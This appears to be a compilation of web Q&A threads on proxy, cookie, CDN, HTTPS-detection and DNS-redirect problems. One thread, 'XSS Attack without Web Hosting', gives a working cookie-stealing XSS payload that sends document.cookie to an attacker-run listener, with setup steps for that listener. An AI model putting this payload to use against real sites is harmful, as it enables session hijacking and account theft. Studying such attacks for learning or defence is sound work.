ShimmerCat with reverse proxy when using "the old way" - django

I have used ShimmerCat with sc-tool to connect to my development sites as described here, and everything has worked always like a charm with it, but I also wanted to follow the "old way" configuring my /etc/hosts. In this case I had a small problem, the server ran ok, and I could access to my development site (let's say that I used https://www.example.com:4043/), but I'm also using a reverse proxy as described on this article, and on the config file reference. It redirects to a Django app I'm using. Let's say it is my devlove.yaml config file:
---
shimmercat-devlove:
domains:
www.example.com:
root-dir: site
consultant: 8080
cache-key: xxxxxxx
api.example.com:
port: 8080
The problem is that when I try to access to a URL that requests the API, a 404 response is sent from the API. Let me try to explain it through an example. I try to access to https://www.example.com:4043/country/, and on this page I do a request to the API: /api/<country>/towns/, then the API endpoint is returning a 404 response so it is not finding this URL, which does not happen when using Google Chrome with sc-tool. I had set both domains www.example.com, and api.example.com on my /etc/hosts. I have been trying to solve it, but without any luck, is there something I'm missing? Any help will be welcome. Thanks in advance.

With a bit more of data, we may be able to find the issue. In the meantime, here is a list of troubleshooting tips:
Possible issue: DNS is cached in browser, /etc/hosts is not being used (yet)
This can happen if somehow your browser has not done a DNS lookup since before you changed your /etc/hosts file. Then the connection is going to a domain in the Internet that may not have the API endpoint that you are calling.
Troubleshooting: Check ShimmerCat's log for the requests. If this is the issue, closing and opening the browser may solve the issue.
Possible issue: the host header is incorrect
ShimmerCat uses the Host header in HTTP/1.1 requests and the :authority header in HTTP/2 requests to distinguish the domains. It always discards any port number present in them. If these headers are not set or are set to a domain other than the ones ShimmerCat is configured to listen, the server will consider the situation so despicable that it will just close the connection.
Troubleshooting: This is not a 404 error, but a connection close (if trying to connect un-proxied, directly to the SSL port where ShimmerCat is listening), or a Socks Connection Failed (if trying to connect through ShimmerCat's built-in SOCKS5 proxy). In the former case, the server will print the message "Rejected request to Just https://some-domain-or-ip/some/path" in his log, using the actual value for the domain, or "Rejected request to Nothing", if no header was present. The second case is more complicated, because the SOCKS5 proxy is before the HTTP routing algorithm.
In any case, the browser will put a red line in the network panel of the developer tools. If you are accessing the server using curl, like this:
curl -k -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
or like
curl -k -H host:api.incorrect-domain.com
(notice the --http2 parameter in the second form), you will get a response:
curl: (56) Unexpected EOF
Extra-tip: There is a field for the network address in the browser's developer tools. Check it, it may tell you something!
Possible issue: something gets messed up when passing the request to the api back-end.
API backends are also sensitive to the host header, and to additional things like authentication cookies and request parameters.
Troubleshooting: A way to diagnose things is invoking ShimmerCat using the --show-proxied-headers command-line option. It makes ShimmerCat to report the proxied headers to the log:
Issuing request with headers :authority: api.example.com
:method: GET
:path: /my/api/endpoint/path/
:scheme: https
accept: */*
user-agent: curl/7.47.0
Possible issue: there are two instances or more of ShimmerCat running
...and they are using different configurations. ShimmerCat uses port sharing among several processes to increase availability. A downside of this is that is perfectly possible to mistakenly start ShimmerCat, forget about stopping it, and start it again after changing some configuration bit. The two instances will be running at the same time, and any of them will pick connections made to the listening port.
Troubleshooting: Shutdown all instances of ShimmerCat, then double-check there are none running by using the corresponding form of the ps command, and start the server with the configuration you want.

Related

Keystone session cookie only working on localhost

Edit:
After investigating this further, it seems cookies are sent correctly on most API requests. However something happens in the specific request that checks if the user is logged in and it always returns null. When refreshing the browser a successful preflight request is sent and nothing else, even though there is a session and a valid session cookie.
Original question:
I have a NextJS frontend authenticating against a Keystone backend.
When running on localhost, I can log in and then refresh the browser without getting logged out, i.e. the browser reads the cookie correctly.
When the application is deployed on an external server, I can still log in, but when refreshing the browser it seems no cookie is found and it is as if I'm logged out. However if I then go to the Keystone admin UI, I am still logged in.
In the browser settings, I can see that for localhost there is a "keystonejs-session" cookie being created. This is not the case for the external server.
Here are the session settings from the Keystone config file.
The value of process.env.DOMAIN on the external server would be for example example.com when Keystone is deployed to admin.example.com. I have also tried .example.com, with a leading dot, with the same result. (I believe the leading dot is ignored in newer specifications.)
const sessionConfig = {
maxAge: 60 * 60 * 24 * 30,
secret: process.env.COOKIE_SECRET,
sameSite: 'lax',
secure: true,
domain: process.env.DOMAIN,
path: "/",
};
const session = statelessSessions(sessionConfig);
(The session object is then passed to the config function from #keystone-6/core.)
Current workaround:
I'm currently using a workaround which involves routing all API requests to '/api/graphql' and rewriting that request to the real URL using Next's own rewrites. Someone recommended this might work and it does, sort of. When refreshing the browser window the application is still in a logged-out state, but after a second or two the session is validated.
To use this workaround, add the following rewrite directive to next.config.js
rewrites: () => [
{
source: '/api/graphql',
destination:
process.env.NODE_ENV === 'development'
? `http://localhost:3000/api/graphql`
: process.env.NEXT_PUBLIC_BACKEND_ENDPOINT,
},
],
Then make sure you use this URL for queries. In my case that's the URL I feed to createUploadLink().
This workaround still means constant error messages in the logs since relative URLs are not supposed to work. I would love to see a proper solution!
It's hard to know what's happening for sure without knowing more about your setup. Inspecting the requests and responses your browser is making may help figure this out. Look in the "network" tab in your browser dev tools. When you make make the request to sign in, you should see the cookie being set in the headers of the response.
Some educated guesses:
Are you accessing your external server over HTTPS?
They Keystone docs for the session API mention that, when setting secure to true...
[...] the cookie is only sent to the server when a request is made with the https: scheme (except on localhost)
So, if you're running your deployed env over plain HTTP, the cookie is never set, creating the behaviour you're describing. Somewhat confusingly, in development the flag is ignored, allowing it to work.
A similar thing can happen if you're deploying behind a proxy, like nginx:
In this scenario, a lot of people choose to have the proxy terminate the TLS connection, so requests are forwarded to the backend over HTTP (but on a private network, so still relatively secure). In that case, you need to do two things:
Ensure the proxy is configured to forward the X-Forwarded-Proto header, which informs the backend which protocol was used originally request
Tell express to trust what the proxy is saying by configuring the trust proxy setting
I did a write up of this proxy issue a while back. It's for Keystone 5 (so some of the details are off) but, if you're using a reverse proxy, most of it's still relevant.
Update
From Simons comment, the above guesses missed the mark 😭 but I'll leave them here in case they help others.
Since posting about this issue a month ago I was actually able to work around it by routing API requests via a relative path like '/api/graphql' and then forwarding that request to the real API on a separate subdomain. For some mysterious reason it works this way.
This is starting to sound like a CORS or issue
If you want to serve your front end from a different origin (domain) than the API, the API needs to return a specific header to allow this. Read up on CORS and the Access-Control-Allow-Origin header. You can configure this setting the cors option in the Keystone server config which Keystone uses to configure the cors package.
Alternatively, the solution of proxying API requests via the Next app should also work. It's not obvious to me why your proxying "workaround" is experiencing problems.

Cannot setup Google Cloud CDN for an external website?

I am following the instructions at https://cloud.google.com/cdn/docs/setting-up-cdn-with-ex-backend-internet-neg and https://medium.com/the-innovation/how-to-enable-google-cdn-for-custom-origin-websites-google-cdn-for-external-websites-56e3fe66cca9 to setup Google Cloud CDN for my website www.datanumen.org.
For the "Fully qualified domain name and port" in "New network endpoint", I choose www.datanumen.org.
All others are same as the above two articles, I use HTTP protocol for all the communications. Finally I get a frontend IP address 34.96.69.82. So I try to visit http://34.96.69.82/, but get a default "SORRY" web page instead of the contents from www.datanumen.org. Why?
Also later I plan to update the DNS A Record for www.datanumen.org so that datanumen.org will points to 34.96.69.82 instead of its current IP address. I am just curious that if I do that, then since what I put in "Fully qualified domain name and port" in "New network endpoint" is www.datanumen.org, will it cause the following deadloop:
a user visit www.datanumen.org
Based on DNS A record, he will go to 34.96.69.82(frondend)
The frontend will request data from backend, and the endpoint is www.datanumen.org,
Based on DNS A record, the backend end point will also solved to 34.96.69.82.
Thus will cause a deadloop for ever?
Update:
For the 1st question, I find the solution. My website is hosted on a server with shared IP. In article https://cloud.google.com/cdn/docs/setting-up-cdn-with-ex-backend-internet-neg, it asks me to add "Host" to the request header, which is used to identify the actual site to be accessed when the request reaches the original server. In my previous configuration, I thought this step is useless so I just skip it. After adding the "Host" field, now I can visit my website properly with the IP address given by Google.
You already fixed your fist issue so you're at a point when you can successfully access your site using an IP address.
Right now all you need is a CDN enabled - if it's not you can do it in the "backend" section of the "load balancing" page.
Have a look also at Network Endpoint Groups documentation to see how to create a load balancer utilising them (the only way you can use GCP's CDN for external site).
To answer your second question - there will be no loop - your site works properly.
Since you're not using secure HTPPS (only HTTP) then you don't have to worry about SSL certificates and the only thing that remains for you to do is to direct your domain to your load-balancer's IP and you're done.
If you encounter any issues or just want to check if CDN is working correctly then have a look at CDN troubleshooting page.
Most simple way to verify if it's working is to use curl: curl -s -D - -o /dev/null http://example.com/style.css and see if you have Cache-Control line present in the output:
HTTP/1.1 200 OK
Date: Tue, 16 Feb 2016 12:00:31 GMT
Content-Type: text/css
Content-Length: 1977
Cache-Control: max-age=86400,public
Via: 1.1 google
However I recommend using HTTPS and SSL certificates for the security reasons - it's much harder to spoof the traffic/listen to the between the site and the client. It's not mandatory though.

XSS Attack without Web Hosting

I am learning about XSS attacks.
Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.
My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.
I don't have a web server to host my cookie-capture script.
What should I do?
You can set up an HTTP server on your own computer quite easily.
For example, Python 3 supports the following one-liner HTTP server:
python -m http.server 8000
This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.
All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):
http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
This will run the following script on the target server:
<script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:
$ python -m http.server 8000
99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -

How to use CGI to Determine if URL Request is using HTTPS?

I am trying to switch our site from HTTP to HTTPS. In some scenarios, we need the site to use HTTP and at other times, HTTPS. I inted to use CGI to determine whether the request is HTTP or HTTPS.
As far as I can tell, the JSON requests must match the original protocol request. If you request, HTTP:// example.org you must call JSON with HTTP:// example.org /file.JSON. If you request, HTTPS:// example.org/ you must call JSON with HTTPS:// example.org/file.JSON.
Normally, I would use CGI variables to tell me whether the request is HTTP or HTTPS. I can test for CGI.HTTPS to see if it is on or off. I can check CGI.SERVER_PORT too see if it is 80 or 443. I can check CGI.SERVER_PORT_SECURE to see if it is 0 or 1.
When I view our web site in every browser, I can dump the CGI variables and get what I expect 100% of the time.
When a few other people in our office and outside our office make the same request, they get CGI variable values that suggest their request is NOT secure. CGI.HTTPS will show off. CGI.SERVER_PORT will show 40. CGI.SERVER_PORT_SECURE will show 0. Every other indicator will show that the site is secure in every browser, but the CGI variable values say it's not secure.
The site behaves flawlessly 100% for everyone for dev and stage. Only in live, which is behind a load balancer, does this issue exist (for some people).
Is this a load balancer issue? Is this certificate settings issue? Why are my CGI variables lying to me? How can I work around this issue?

AWS VPC instance doesn't resolve public DNS name

The problem:
My url xyz.co is getting resolved into an ugly AWS public DNS name such as ec2-11-22-33-44.ap-southeast-2.compute.amazonaws.com. It doesn't stick to xyz.co.
Here's what I did:
I have set up my Route 53 configuration according to http://docs.aws.amazon.com/Route53/latest/DeveloperGuide/MigratingDNS.html, so I created an A record pointing to the IP address and a CNAME alias record to allow for www.xyz.co. The domain is sitting with godaddy and the name servers are configured to the AWS delegation set.
The instance itself sits in the default VPC. I double-checked and DNS resolution and DNS host names are both active.
I'm a bit stuck here with this. Any help would be highly appreciated!
Cheers,
Bruno
What you are seeing isn't actually related to name resolution.
It's impossible for DNS to change what appears in the address bar of the web browser -- DNS and web browsers simply do not interact in a way that makes such behavior possible. Your URL is not "getting resolved to" this new value via anything DNS-related, since DNS, configured correctly or incorrectly, can't impact what shows up there, on its own.
The fact that navigating to the IP address has the same impact backs up this assertion.
What you are seeing is not related in any way to DNS or Route 53 or even EC2 or VPC. Your web server is, for whatever reason, configured to redirect incoming requests with any other hostname... over to the hostname you are subsequently seeing in the address bar (which is the one you don't like).
You should notice this in your web server's log. It will be issuing a 301 or 302 redirect on the initial request.
You should also be able to verify this yourself with the curl command line utility. Here, a server accessed as "www.example.com" is redirecting the browser to use its preferred address, "example.com." (Hostnames and addresses are sanitized, but the output is otherwise unmodified.)
$ curl -v www.example.com
* Rebuilt URL to: www.example.com/
* Hostname was NOT found in DNS cache
* Trying 203.0.113.139...
* Connected to www.example.com (203.0.113.139) port 80 (#0)
The next block of output is the request sent to the web server.
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.example.com
> Accept: */*
>
The http response from the web server includes a redirect.
< HTTP/1.1 301 Moved Permanently
< Content-length: 0
< Location: http://example.com/
< Connection: close
<
* Closing connection 0
If we were using a browser instead of a command line tool, this would cause the address bar to change to the new value, and establish a new connection to the web server (which might actually be the same one, or a different one... in this case, it's the same).
In spite of the fact that I had typed http://www.example.com into my browser, it would now show only http://example.com/. The same thing would happen if I typed in the IP address if my server was configured to redirect everything to one hostname, as yours appears to be. In my case, it's deliberately configured to do something else.
The above should illustrate that you do not actually have a DNS issue, and explain the mechanism that's causing this to occur (because you may find this to be something useful to do deliberately in the future, as my web servers do -- any www.* request gets stripped and rewritten without the www).
The issue is with your web server, telling the browser to use a different hostname. How to fix that will depend on what web server you are running and why it thinks the redirect is necessary.